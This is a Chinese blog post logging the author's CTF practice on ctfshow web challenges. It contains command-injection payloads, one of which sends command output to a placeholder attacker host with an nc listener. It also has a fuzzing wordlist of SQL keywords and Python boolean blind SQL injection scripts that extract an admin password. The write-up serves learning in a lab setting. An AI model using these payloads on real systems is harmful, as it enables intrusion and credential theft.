CTF训练日记1--ctfshow萌赛

最新推荐文章于 2024-05-15 02:25:50 发布
最新推荐文章于 2024-05-15 02:25:50 发布
阅读量903 收藏 3
点赞数
分类专栏: CTF训练日记 文章标签: 安全 web安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/unexpectedthing/article/details/121111588
版权

文章目录

签到题

<?php 
if(isset($_GET['url'])){
        system("curl https://".$_GET['url'].".ctf.show");
}else{
        show_source(__FILE__);
}
 ?>

这个题,比较简单,直接使用分号,执行多个命令来绕过

payload:
1;ls;1
可以再次回顾一下,||,&&,&,|,;的作用

Linux的特殊符号
想法2:
其实这个题,看到curl,我想到了用反弹shell

?url=xxxx:10000?p=$(ls);1
?url=xxxx:10000?p=$(cat flag);1

nc -lvvp 10000
但是监听端口后,出现一堆乱码,我就不知道咋做了。
关于$()实现命令执行

给她

dirsearch扫描,发现git泄露
GitHack扫描
找到hint.php

<?php
$pass=sprintf("and pass='%s'",addslashes($_GET['pass']));
$sql=sprintf("select * from user where name='%s' $pass",addslashes($_GET['name']));
?>

看到addslashes,是个宽字节注入
这个函数是在单引号(’)、双引号(")、反斜线(\)与 NUL(null 字符)前加反斜杠。

这儿有个sprintf,不会输出,而是将格式化的字符串存入变量。

sprintf() 函数把格式化的字符串写入变量中。
arg1、arg2、++ 参数将被插入到主字符串中的百分号(%)符号处。该函数是逐步执行的。在第一个 % 符号处,插入 arg1,在第二个 % 符号处,插入 arg2,依此类推。

注释:如果 % 符号多于 arg 参数,则您必须使用占位符。占位符位于 % 符号之后,由数字和 "\$" 组成

再看看[关于sprintf的运用],实现字符逃逸(https://hetian.blog.csdn.net/article/details/106330242)
关于php://filter过滤器

https://tyskill.github.io/posts/php_filter_%E8%BF%87%E6%BB%A4%E5%99%A8/
https://blog.csdn.net/qq_44657899/article/details/109300335

web_假赛生

首先打开首页是个代码

<?php
session_start();
include('config.php');
if(empty($_SESSION['name'])){
    show_source("index.php");
}else{
    $name=$_SESSION['name'];
    $sql='select pass from user where name="'.$name.'"';
    echo $sql."<br />";
    system('4rfvbgt56yhn.sh');
    $query=mysqli_query($conn,$sql);
    $result=mysqli_fetch_assoc($query);
    if($name==='admin'){
        echo "admin!!!!!"."<br />";
        if(isset($_GET['c'])){
            preg_replace_callback("/\w\W*/",function(){die("not allowed!");},$_GET['c'],1);
            echo $flag;
        }else{
            echo "you not admin";
        }
    }
}
?>

看代码有个数据库的操作,而且需要$name=admin
我们看login.php和register.php两个文件。
显然是让我们先注册,再登录,试了一下

如果要我们$name=admin,必须登录admin
发现admin登陆不上,于是

绕过$name='admin'
我们注册,admin空格
然后登录admin

urlencode的空格编码为+或者%20
接下来是绕过c
preg_replace_callback

[\s]表示,只要出现空白就匹配
[\S]表示,非空白就匹配
\w 匹配包括下划线的任何单词字符。等价于“[A-Za-z0-9_]"。
\W 匹配任何非单词字符。等价于“[^A-Za-z0-9_]"。

我们直接不传c的值就可以了。

萌新记忆

打开环境,尝试了一下抓包,F12都没有结果,就开始扫描有没有后台
看到后台/admin
进去之后,就是个sql注入测试,抓包POST的sql注入
其中尝试,u=admin,只需要搞出password

①用户名/密码错误:当输入的用户名不为admin且不超过限制的长度时
②用户名错误:用户名长度超过限制(字符长度最大为20)
③密码错误:输入用户名为admin,密码错误

我们用字典Fuzz一下过滤了许多东西
这儿可以用bp爆破,也可以使用python爆破

import requests
url="http://4ccce490-0a3c-4194-b7c6-8866c8557265.challenge.ctf.show/admin/checklogin.php"
f1=open("noallow.txt","a")
f2=open("allow.txt","a")
with open("a.txt","r") as f:
    while True:
        username=f.readline()
        if username:
            data = {
                "u": username,
                "p": "123"
            }
            response=requests.post(url=url,data=data)
            if "我报警了" in response.text:
                print(username)
                f1.write(username)
            else:
                f2.write(username)
        else:
            break
f1.close()
f2.close()

字典如下

length 
+
handler
like
select 
sleep
database
delete
having
or
as
-~
BENCHMARK
limit
left
select
insert
sys.schema_auto_increment_columns
join
right
#
&
&&
\
handler
-- -
--
--+
INFORMATION
--
;
!
%
+
xor
<>
(
>
<
)
.
^
=
AND
BY
CAST
COLUMN
COUNT
CREATE
END
case
'1'='1
when
admin'
"
length 
+
length
REVERSE

ascii
select 
database
left
right
'
union
||
oorr
/
//
//*
*/*
/**/
anandd
GROUP
HAVING
IF
INTO
JOIN
LEAVE
LEFT
LEVEL
sleep
LIKE
NAMES
NEXT
NULL
OF
ON
|
infromation_schema
user
OR
ORDER
ORD
SCHEMA
SELECT
SET
TABLE
THEN
UPDATE
USER
USING
VALUE
VALUES
WHEN
WHERE
ADD
AND
prepare
set
update
delete
drop
inset
CAST
COLUMN
CONCAT
GROUP_CONCAT
group_concat
CREATE
DATABASE
DATABASES
alter
DELETE
DROP
floor
rand()
information_schema.tables
TABLE_SCHEMA
%df
concat_ws()
concat
LIMIT
ORD
ON
extractvalue
order 
CAST()
by
ORDER
OUTFILE
RENAME
REPLACE
SCHEMA
SELECT
SET
updatexml
SHOW
SQL
TABLE
THEN
TRUE
instr
benchmark
format
bin
substring
ord

UPDATE
VALUES
VARCHAR
VERSION
WHEN
WHERE
/*
`
  
,
users
%0a
%0b
mid
for
BEFORE
REGEXP
RLIKE
in
sys schemma
SEPARATOR
XOR
CURSOR
FLOOR
sys.schema_table_statistics_with_buffer
INFILE
count
%0c
from
%0d
%a0
=
@
else

但是其中length和substr没有过滤,尝试盲注,直接python爆破

先爆破length

import requests

for i in range(1,100):
    url="http://f478b5e7-b9ce-4acc-9878-ccadb1eba9aa.challenge.ctf.show/admin/checklogin.php"
    data={
        "u": "'||length(p)<'{}".format(i),
        "p": " "
    },
    response=requests.post(url=url,data=data)
    if "用户名" not in response.text:
        flag=str(i)
        print(flag)
        break

但是这个脚本我觉得我没有问题,但是返回的有点问题
手工猜就可以用二分法,字段长为17

然后爆字段名

import requests

flag = ''
for i in range(1, 18):
    for j in '0123456789abcdefghijklmnopqrstuvwxyz':
        url = "http://f478b5e7-b9ce-4acc-9878-ccadb1eba9aa.challenge.ctf.show/admin/checklogin.php"
        data = {"u": "'||substr(p,{},1)<'{}".format(i,j),#substr是从1开始
                "p": ""
                }
        # print(data)
        c = requests.post(url, data=data)
        # print(c.text)
        if '用户名' not in c.text:
            flag += chr(ord(j)-1)#前一个字符
            print(flag)
            break

得到字段名,登录就可以得flag

Z3eyOnd
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[NPUCTF2020]ezlogin (xpath盲注)
记录学习,一起进步
03-26 701
[NPUCTF2020]ezlogin (xpath盲注)
CTF--web学习
qq_45655136的博客
01-08 7682
这是大二上学期主要学习的一些知识,分享一下 一、linux常见命令 Linux切换到超级管理员 sudo su 切换到普通用户 su username touch创建文件 mkdir创建文件夹 mkdir -p ./aaa/bbb/ccc创建aaa/bbb/ccc目录 mv 既可以重命名,又可以移动文件或文件夹 rm -r就是向下递归,不管有多少级目录,一并删除 ​ -f就是直接删除,不作任何提示的 cp拷贝 pwd查看当前目录 ‘>’ '>>'将命令执行结果重定向
网络安全最新BUUCTF BUU SQL COURSE 1_ctf sql 只提示用户名或密码错误,天呐
最新发布
2401_84254087的博客
05-15 229
通过判断可知contents表应为热点新闻的数据表,admin大概率为用户表,所以我们构建sql根据表名查询该表下的各字段名,成功得到字段名:id,username,password。然后我们构造order by sql语句验证该数据表中共有几列数据,当我们order by 3时,列表为空,而order by 2时,列表有数据,则证明该数据表中只有两列。根据数据库名,我们可以在源数据库information_schema中查到该数据库的所有表名,当前查到一共两张表,admin和contents表。
BUUOJweb刷题wp(三)
Theseus_sky的博客
09-15 543
强网杯2019随便注 堆叠注入原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FROM products服务器端生成的sql语
ctfshow 萌新赛 给她
qq_39980334的博客
11-15 1644
.git泄露 sprintf绕过 伪协议
ctfshow-给她
XYH_233的博客
03-16 645
ctfshow萌新赛 给她
ctfshow—萌新赛—给她
HAI_WD的博客
09-02 431
文中工具皆可关注 皓月当空w 公众号 发送关键字获取。
麟阁CTF天梯赛ftp-smtp
12-22
【标题】:“麟阁CTF天梯赛ftp-smtp”是一个网络安全竞赛,主要涉及FTP(File Transfer Protocol)和SMTP(Simple Mail Transfer Protocol)两大网络协议的挑战。在这样的比赛中,参赛者通常需要通过分析网络流量...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
CTF-领域指南-(系列1)
12-18
1.参赛选手能够根据大赛提供的赛项要求,设计信息安全防护方案, 并且能够提供详细的信息安全防护设备拓扑图。 2.参赛选手能够根据业务需求和实际的工程应用环境,实现网络设 备、安全设备、服务器的连接,通过调试...
ctf-all-in-one
01-30
ctf-all-in-one
CTFshow web入门——文件包含
小元砸的博客
02-07 3409
Web 78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 一.分析代码: 使用 include进行了文件包含 二.解题过程: 构造playload: ?file=php://filter/read=convert.base64-encode/resource=flag.php Web 79 <?p
每日CTF Web:Mangager
sinat_40845893的博客
01-24 444
“百度杯”CTF比赛 Web:Mangager 考察点: SQL注入、数据库字段猜解 求解流程: 1 千里之行 首先进入题目,是道登录题,一般就是SQL注入。先随便试试,输入账号test密码123,提示用户名错误 输入账号admin密码123,提示密码错误, 则存在账号admin,猜测后台执行了查询账号的操作,接下来就是寻找注入点。 2 牛刀小试 测试布尔盲注,输入用户名 admin' and 1=2# 问题来了,当输入单引号时,弹出警告“iillegal character”,查看页面源码,存在三个j
ctfshow 萌xin赛
weixin_63231007的博客
04-25 1521
萌新赛 给她 git源码泄露.得到源码为 <?php $pass=sprintf("and pass='%s'",addslashes($_GET['pass'])); $sql=sprintf("select * from user where name='%s' $pass",addslashes($_GET['name'])); ?> 查看别人题解,里写了有关sprintf函数的作用漏洞。从WordPress SQLi谈PHP格式化字符串问题(2017.11.01更新)
ctfshow萌新赛web
qq_44657899的博客
08-17 3567
文章目录萌新赛web_给她 萌新赛web_给她 首先由题目给她可以联想出git源码泄露。 得到的源码如下: <?php $pass=sprintf("and pass='%s'",addslashes($_GET['pass'])); $sql=sprintf("select * from user where name='%s' $pass",addslashes($_GET['name'])); ?> 这里有个sprintf()函数没有看到过,搜了搜它的作用和漏洞,看到一个和本题很像的例子
ctfshow 给他
m0_68074153的博客
08-18 1358
单引号转义绕过,addslashes漏洞
CTF命令执行题目解题思路
悦分享
08-02 735
可以看到该文件有curl xx.x.x.x|bash字符,在linux下输入任意一个字符后加\是不会中断当前操作,可以继续输入内容。而后面没有\则会中断,而sh可以在报错的情况下依然会执行可以执行的命令,因此不会影响curl的执行。在自己服务器中放入bash一句话,利用curl ip|bash反弹shell。ls -t >g是倒序输出文件名字,然后sh _执行此文件,写入到g中。原理就是利用curl ip|bash等很多方式去反弹shell。利用linux下特有的命令来写入shell反弹。...
在linux下使用curl访问 多参数url GET参数问题
热门推荐
溯缔的博客
09-06 1万+
一、在Crontab中使用PHP执行脚本 就像在Crontab中调用普通的shell脚本一样(具体Crontab用法),使用PHP程序来调用PHP脚本。 每一小时执行myscript.php如下: crontab -e 00 * * * * /usr/local/bin/php /home/john/myscript.php /usr/local/bin/php为PHP程序的路径。 ...
CTFHub 命令注入-无过滤
07-25
common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CTFhub——...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值